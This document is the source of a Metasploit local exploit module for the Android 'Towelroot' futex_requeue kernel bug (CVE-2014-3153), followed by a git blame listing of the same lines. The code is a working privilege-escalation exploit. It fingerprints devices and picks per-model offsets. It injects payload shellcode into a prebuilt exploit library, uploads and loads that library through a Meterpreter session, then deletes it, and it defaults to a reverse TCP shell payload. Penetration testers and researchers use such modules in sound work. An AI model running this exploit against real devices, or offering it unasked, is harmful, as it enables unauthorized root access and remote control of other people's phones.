modules/exploits/android/local/futex_requeue.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::File
  include Msf::Post::Common
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        {
          'Name' => "Android 'Towelroot' Futex Requeue Kernel Exploit",
          'Description' => %q{
            This module exploits a bug in futex_requeue in the Linux kernel, using
            similar techniques employed by the towelroot exploit. Any Android device
            with a kernel built before June 2014 is likely to be vulnerable.
          },
          'License' => MSF_LICENSE,
          'Author' => [
            'Pinkie Pie', # discovery
            'geohot',     # towelroot
            'timwr'       # metasploit module
          ],
          'References' => [
            [ 'CVE', '2014-3153' ],
            [ 'URL', 'http://tinyhack.com/2014/07/07/exploiting-the-futex-bug-and-uncovering-towelroot/' ],
            [ 'URL', 'http://web.archive.org/web/20160912014145/http://blog.nativeflow.com:80/the-futex-vulnerability' ],
          ],
          'DisclosureDate' => '2014-05-03',
          'SessionTypes' => [ 'meterpreter' ],
          'Platform' => [ 'android', 'linux' ],
          'Payload' => { 'Space' => 2048 },
          'DefaultOptions' => {
            'WfsDelay' => 300,
            'PAYLOAD' => 'linux/armle/meterpreter/reverse_tcp'
          },
          'Notes' => {
            'Stability' => [CRASH_SAFE],
            'SideEffects' => [],
            'Reliability' => [],
            'AKA' => ['towelroot']
          },
          'DefaultTarget' => 0,
          'Targets' => [
            # Automatic targetting via getprop ro.build.model
            ['Automatic Targeting', { 'auto' => true }],

            # This is the default setting, Nexus 4, 5, 7, etc
            [
              'Default',
              {
                'new_samsung' => false,
                'iovstack' => 2,
                'offset' => 0,
                'force_remove' => false
              }
            ],

            # Samsung devices, S3, S4, S5, etc
            [
              'New Samsung',
              {
                'new_samsung' => true,
                'iovstack' => 2,
                'offset' => 7380,
                'force_remove' => true
              }
            ],

            # Older Samsung devices, e.g the Note 2
            [
              'Old Samsung',
              {
                'new_samsung' => false,
                'iovstack' => 1,
                'offset' => 0,
                'force_remove' => true
              }
            ],

            # Samsung Galaxy Grand, etc
            [
              'Samsung Grand',
              {
                'new_samsung' => false,
                'iovstack' => 5,
                'offset' => 0,
                'force_remove' => true
              }
            ],
          ],
          'Compat' => {
            'Meterpreter' => {
              'Commands' => %w[
                core_loadlib
                stdapi_fs_delete_file
                stdapi_fs_getwd
              ]
            }
          }
        }
      )
    )
  end

  def check
    os = cmd_exec('getprop ro.build.version.release')
    unless Rex::Version.new(os) < Rex::Version.new('4.5.0')
      vprint_error "Android version #{os} does not appear to be vulnerable"
      return CheckCode::Safe
    end
    vprint_good "Android version #{os} appears to be vulnerable"

    CheckCode::Appears
  end

  def exploit
    if target['auto']
      product = cmd_exec('getprop ro.build.product')
      fingerprint = cmd_exec('getprop ro.build.fingerprint')
      print_status("Found device: #{product}")
      print_status("Fingerprint: #{fingerprint}")

      if [
        'mako',
        'm7',
        'hammerhead',
        'grouper',
        'Y530-U00',
        'G6-U10',
        'g2',
        'w7n',
        'D2303',
        'cancro',
      ].include? product
        my_target = targets[1] # Default
      elsif [
        'klte', # Samsung Galaxy S5
        'jflte', # Samsung Galaxy S4
        'd2vzw' # Samsung Galaxy S3 Verizon (SCH-I535 w/ android 4.4.2, kernel 3.4.0)
      ].include? product
        my_target = targets[2] # New Samsung
      elsif [
        't03g',
        'm0',
      ].include? product
        my_target = targets[3] # Old Samsung
      elsif [
        'baffinlite',
        'Vodafone_785',
      ].include? product
        my_target = targets[4] # Samsung Grand
      else
        print_status("Could not automatically target #{product}")
        my_target = targets[1] # Default
      end
    else
      my_target = target
    end

    print_status("Using target: #{my_target.name}")

    local_file = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2014-3153.so')
    exploit_data = File.read(local_file, mode: 'rb')

    # Substitute the exploit shellcode with our own
    space = payload_space
    payload_encoded = payload.encoded
    exploit_data.gsub!("\x90" * 4 + "\x00" * (space - 4), payload_encoded + "\x90" * (payload_encoded.length - space))

    # Apply the target config
    offsets = my_target.opts
    config_buf = [
      offsets['new_samsung'] ? -1 : 0,
      offsets['iovstack'].to_i,
      offsets['offset'].to_i,
      offsets['force_remove'] ? -1 : 0,
    ].pack('I4')
    exploit_data.gsub!('c0nfig' + "\x00" * 10, config_buf)

    workingdir = session.fs.dir.getwd
    remote_file = "#{workingdir}/#{Rex::Text.rand_text_alpha_lower(5)}"
    write_file(remote_file, exploit_data)

    print_status("Loading exploit library #{remote_file}")
    session.core.load_library(
      'LibraryFilePath' => local_file,
      'TargetFilePath' => remote_file,
      'UploadLibrary' => false,
      'Extension' => false,
      'SaveToDisk' => false
    )
    print_status("Loaded library #{remote_file}, deleting")
    session.fs.file.rm(remote_file)
    print_status("Waiting #{datastore['WfsDelay']} seconds for payload")
  end
end
futex_requeue 2014-12-01 03:49:22 +00:00			`##`
use https for metaploit.com links 2017-07-24 06:26:21 -07:00			`# This module requires Metasploit: https://metasploit.com/download`
fix msftidy warnings about towelroot module 2015-02-11 11:17:44 -06:00			`# Current source: https://github.com/rapid7/metasploit-framework`
futex_requeue 2014-12-01 03:49:22 +00:00			`##`

use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00			`class MetasploitModule < Msf::Exploit::Local`
futex_requeue 2014-12-01 03:49:22 +00:00			`Rank = ExcellentRanking`

			`include Msf::Post::File`
			`include Msf::Post::Common`
Migrate old uses of manual autocheck to use the new prepend autocheck 2020-09-18 11:38:43 +01:00			`prepend Msf::Exploit::Remote::AutoCheck`
futex_requeue 2014-12-01 03:49:22 +00:00
Run Rubocop layout rules on modules 2021-09-10 12:53:39 +01:00			`def initialize(info = {})`
			`super(`
			`update_info(`
			`info,`
			`{`
			`'Name' => "Android 'Towelroot' Futex Requeue Kernel Exploit",`
			`'Description' => %q{`
Fix up titles, descriptions 2015-02-12 12:11:40 -06:00			`This module exploits a bug in futex_requeue in the Linux kernel, using`
40% done 2017-08-28 20:17:58 -04:00			`similar techniques employed by the towelroot exploit. Any Android device`
Comma fascism 2015-02-12 12:49:45 -06:00			`with a kernel built before June 2014 is likely to be vulnerable.`
Run Rubocop layout rules on modules 2021-09-10 12:53:39 +01:00			`},`
			`'License' => MSF_LICENSE,`
			`'Author' => [`
Fix up titles, descriptions 2015-02-12 12:11:40 -06:00			`'Pinkie Pie', # discovery`
			`'geohot', # towelroot`
			`'timwr' # metasploit module`
Run Rubocop layout rules on modules 2021-09-10 12:53:39 +01:00			`],`
			`'References' => [`
futex_requeue 2014-12-01 03:49:22 +00:00			`[ 'CVE', '2014-3153' ],`
			`[ 'URL', 'http://tinyhack.com/2014/07/07/exploiting-the-futex-bug-and-uncovering-towelroot/' ],`
Updates more dead links 2025-02-28 09:35:28 +00:00			`[ 'URL', 'http://web.archive.org/web/20160912014145/http://blog.nativeflow.com:80/the-futex-vulnerability' ],`
convert futex_requeue module to use targetting and core_loadlib 2016-10-19 13:17:33 +08:00			`],`
Run Rubocop layout rules on modules 2021-09-10 12:53:39 +01:00			`'DisclosureDate' => '2014-05-03',`
			`'SessionTypes' => [ 'meterpreter' ],`
modules/exploits/android: Resolve RuboCop violations 2025-04-26 01:28:35 +10:00			`'Platform' => [ 'android', 'linux' ],`
			`'Payload' => { 'Space' => 2048 },`
Run Rubocop layout rules on modules 2021-09-10 12:53:39 +01:00			`'DefaultOptions' => {`
			`'WfsDelay' => 300,`
modules/exploits/android: Resolve RuboCop violations 2025-04-26 01:28:35 +10:00			`'PAYLOAD' => 'linux/armle/meterpreter/reverse_tcp'`
Run Rubocop layout rules on modules 2021-09-10 12:53:39 +01:00			`},`
tests passing 2023-03-13 10:31:27 +00:00			`'Notes' => {`
			`'Stability' => [CRASH_SAFE],`
			`'SideEffects' => [],`
			`'Reliability' => [],`
modules/exploits/android: Resolve RuboCop violations 2025-04-26 01:28:35 +10:00			`'AKA' => ['towelroot']`
			`},`
Run Rubocop layout rules on modules 2021-09-10 12:53:39 +01:00			`'DefaultTarget' => 0,`
			`'Targets' => [`
			`# Automatic targetting via getprop ro.build.model`
			`['Automatic Targeting', { 'auto' => true }],`

			`# This is the default setting, Nexus 4, 5, 7, etc`
			`[`
			`'Default',`
			`{`
			`'new_samsung' => false,`
			`'iovstack' => 2,`
			`'offset' => 0,`
modules/exploits/android: Resolve RuboCop violations 2025-04-26 01:28:35 +10:00			`'force_remove' => false`
Run Rubocop layout rules on modules 2021-09-10 12:53:39 +01:00			`}`
			`],`

			`# Samsung devices, S3, S4, S5, etc`
			`[`
			`'New Samsung',`
			`{`
			`'new_samsung' => true,`
			`'iovstack' => 2,`
			`'offset' => 7380,`
modules/exploits/android: Resolve RuboCop violations 2025-04-26 01:28:35 +10:00			`'force_remove' => true`
Run Rubocop layout rules on modules 2021-09-10 12:53:39 +01:00			`}`
			`],`

			`# Older Samsung devices, e.g the Note 2`
			`[`
			`'Old Samsung',`
			`{`
			`'new_samsung' => false,`
			`'iovstack' => 1,`
			`'offset' => 0,`
modules/exploits/android: Resolve RuboCop violations 2025-04-26 01:28:35 +10:00			`'force_remove' => true`
Run Rubocop layout rules on modules 2021-09-10 12:53:39 +01:00			`}`
			`],`

			`# Samsung Galaxy Grand, etc`
			`[`
			`'Samsung Grand',`
			`{`
			`'new_samsung' => false,`
			`'iovstack' => 5,`
			`'offset' => 0,`
modules/exploits/android: Resolve RuboCop violations 2025-04-26 01:28:35 +10:00			`'force_remove' => true`
Run Rubocop layout rules on modules 2021-09-10 12:53:39 +01:00			`}`
			`],`
convert futex_requeue module to use targetting and core_loadlib 2016-10-19 13:17:33 +08:00			`],`
Add Meterpreter compatibility metadata 2021-10-06 13:43:31 +01:00			`'Compat' => {`
			`'Meterpreter' => {`
			`'Commands' => %w[`
			`core_loadlib`
			`stdapi_fs_delete_file`
			`stdapi_fs_getwd`
			`]`
			`}`
modules/exploits/android: Resolve RuboCop violations 2025-04-26 01:28:35 +10:00			`}`
Run Rubocop layout rules on modules 2021-09-10 12:53:39 +01:00			`}`
			`)`
			`)`
first upgrade on futex 2019-10-22 21:05:55 -04:00			`end`

			`def check`
modules/exploits/android: Resolve RuboCop violations 2025-04-26 01:28:35 +10:00			`os = cmd_exec('getprop ro.build.version.release')`
Handle nil versions for rubygems 4 2021-02-17 12:33:59 +00:00			`unless Rex::Version.new(os) < Rex::Version.new('4.5.0')`
add some more comments 2019-10-23 14:45:32 +08:00			`vprint_error "Android version #{os} does not appear to be vulnerable"`
first upgrade on futex 2019-10-22 21:05:55 -04:00			`return CheckCode::Safe`
			`end`
			`vprint_good "Android version #{os} appears to be vulnerable"`

			`CheckCode::Appears`
futex_requeue 2014-12-01 03:49:22 +00:00			`end`

			`def exploit`
convert futex_requeue module to use targetting and core_loadlib 2016-10-19 13:17:33 +08:00			`if target['auto']`
modules/exploits/android: Resolve RuboCop violations 2025-04-26 01:28:35 +10:00			`product = cmd_exec('getprop ro.build.product')`
			`fingerprint = cmd_exec('getprop ro.build.fingerprint')`
convert futex_requeue module to use targetting and core_loadlib 2016-10-19 13:17:33 +08:00			`print_status("Found device: #{product}")`
			`print_status("Fingerprint: #{fingerprint}")`
futex_requeue 2014-12-01 03:49:22 +00:00
convert futex_requeue module to use targetting and core_loadlib 2016-10-19 13:17:33 +08:00			`if [`
modules/exploits/android: Resolve RuboCop violations 2025-04-26 01:28:35 +10:00			`'mako',`
			`'m7',`
			`'hammerhead',`
			`'grouper',`
			`'Y530-U00',`
			`'G6-U10',`
			`'g2',`
			`'w7n',`
			`'D2303',`
			`'cancro',`
convert futex_requeue module to use targetting and core_loadlib 2016-10-19 13:17:33 +08:00			`].include? product`
more fixes 2016-11-06 14:33:24 +00:00			`my_target = targets[1] # Default`
convert futex_requeue module to use targetting and core_loadlib 2016-10-19 13:17:33 +08:00			`elsif [`
modules/exploits/android: Resolve RuboCop violations 2025-04-26 01:28:35 +10:00			`'klte', # Samsung Galaxy S5`
			`'jflte', # Samsung Galaxy S4`
			`'d2vzw' # Samsung Galaxy S3 Verizon (SCH-I535 w/ android 4.4.2, kernel 3.4.0)`
convert futex_requeue module to use targetting and core_loadlib 2016-10-19 13:17:33 +08:00			`].include? product`
more fixes 2016-11-06 14:33:24 +00:00			`my_target = targets[2] # New Samsung`
convert futex_requeue module to use targetting and core_loadlib 2016-10-19 13:17:33 +08:00			`elsif [`
modules/exploits/android: Resolve RuboCop violations 2025-04-26 01:28:35 +10:00			`'t03g',`
			`'m0',`
convert futex_requeue module to use targetting and core_loadlib 2016-10-19 13:17:33 +08:00			`].include? product`
more fixes 2016-11-06 14:33:24 +00:00			`my_target = targets[3] # Old Samsung`
convert futex_requeue module to use targetting and core_loadlib 2016-10-19 13:17:33 +08:00			`elsif [`
modules/exploits/android: Resolve RuboCop violations 2025-04-26 01:28:35 +10:00			`'baffinlite',`
			`'Vodafone_785',`
convert futex_requeue module to use targetting and core_loadlib 2016-10-19 13:17:33 +08:00			`].include? product`
more fixes 2016-11-06 14:33:24 +00:00			`my_target = targets[4] # Samsung Grand`
convert futex_requeue module to use targetting and core_loadlib 2016-10-19 13:17:33 +08:00			`else`
			`print_status("Could not automatically target #{product}")`
more fixes 2016-11-06 14:33:24 +00:00			`my_target = targets[1] # Default`
convert futex_requeue module to use targetting and core_loadlib 2016-10-19 13:17:33 +08:00			`end`
more fixes 2016-11-06 14:33:24 +00:00			`else`
			`my_target = target`
convert futex_requeue module to use targetting and core_loadlib 2016-10-19 13:17:33 +08:00			`end`
futex_requeue 2014-12-01 03:49:22 +00:00
more fixes 2016-11-06 14:33:24 +00:00			`print_status("Using target: #{my_target.name}")`
futex_requeue 2014-12-01 03:49:22 +00:00
modules/exploits/android: Resolve RuboCop violations 2025-04-26 01:28:35 +10:00			`local_file = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2014-3153.so')`
Specify mode rb on file reads 2022-02-12 21:39:12 +00:00			`exploit_data = File.read(local_file, mode: 'rb')`
fix msftidy warnings about towelroot module 2015-02-11 11:17:44 -06:00
convert futex_requeue module to use targetting and core_loadlib 2016-10-19 13:17:33 +08:00			`# Substitute the exploit shellcode with our own`
			`space = payload_space`
			`payload_encoded = payload.encoded`
			`exploit_data.gsub!("\x90" * 4 + "\x00" * (space - 4), payload_encoded + "\x90" * (payload_encoded.length - space))`

			`# Apply the target config`
more fixes 2016-11-06 14:33:24 +00:00			`offsets = my_target.opts`
convert futex_requeue module to use targetting and core_loadlib 2016-10-19 13:17:33 +08:00			`config_buf = [`
			`offsets['new_samsung'] ? -1 : 0,`
			`offsets['iovstack'].to_i,`
			`offsets['offset'].to_i,`
			`offsets['force_remove'] ? -1 : 0,`
			`].pack('I4')`
modules/exploits/android: Resolve RuboCop violations 2025-04-26 01:28:35 +10:00			`exploit_data.gsub!('c0nfig' + "\x00" * 10, config_buf)`
futex_requeue 2014-12-01 03:49:22 +00:00
convert futex_requeue module to use targetting and core_loadlib 2016-10-19 13:17:33 +08:00			`workingdir = session.fs.dir.getwd`
modules/exploits/android: Resolve RuboCop violations 2025-04-26 01:28:35 +10:00			`remote_file = "#{workingdir}/#{Rex::Text.rand_text_alpha_lower(5)}"`
convert futex_requeue module to use targetting and core_loadlib 2016-10-19 13:17:33 +08:00			`write_file(remote_file, exploit_data)`

			`print_status("Loading exploit library #{remote_file}")`
			`session.core.load_library(`
Run Rubocop layout rules on modules 2021-09-10 12:53:39 +01:00			`'LibraryFilePath' => local_file,`
			`'TargetFilePath' => remote_file,`
			`'UploadLibrary' => false,`
			`'Extension' => false,`
			`'SaveToDisk' => false`
convert futex_requeue module to use targetting and core_loadlib 2016-10-19 13:17:33 +08:00			`)`
fork early and use WfsDelay 2016-12-20 00:59:27 +08:00			`print_status("Loaded library #{remote_file}, deleting")`
convert futex_requeue module to use targetting and core_loadlib 2016-10-19 13:17:33 +08:00			`session.fs.file.rm(remote_file)`
fork early and use WfsDelay 2016-12-20 00:59:27 +08:00			`print_status("Waiting #{datastore['WfsDelay']} seconds for payload")`
convert futex_requeue module to use targetting and core_loadlib 2016-10-19 13:17:33 +08:00			`end`
futex_requeue 2014-12-01 03:49:22 +00:00			`end`